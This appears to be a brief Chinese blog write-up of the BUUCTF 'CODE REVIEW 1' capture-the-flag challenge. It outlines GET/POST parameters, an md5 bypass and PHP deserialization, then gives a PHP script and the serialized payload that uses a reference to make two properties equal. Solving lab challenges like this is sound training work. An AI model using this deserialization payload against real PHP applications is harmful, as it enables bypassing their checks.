0、打开靶机后,是php源码
BUUCTF-CODE REVIEW 1(代码审计)
  1、第一层是GET,POST传参
  2、第二层md5绕过
  3、第三层是php反序列

 1 <?php
 2 class BUU{
 3     public $correct="";
 4     public $input="";
 5 }
 6 
 7 $obj= new BUU;
 8 $obj->input=&$obj->correct;
 9 echo serialize($obj);
10 ?>

  得到的字符串:

  O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

  4、放postman。

相关文章:

  • 2021-06-27
  • 2021-08-27
  • 2022-12-23
  • 2022-12-23
  • 2021-09-26
  • 2021-04-04
  • 2021-08-21
猜你喜欢
  • 2022-12-23
  • 2021-10-06
  • 2021-10-24
  • 2021-06-29
  • 2022-12-23
  • 2022-12-23
  • 2021-10-30
相关资源
相似解决方案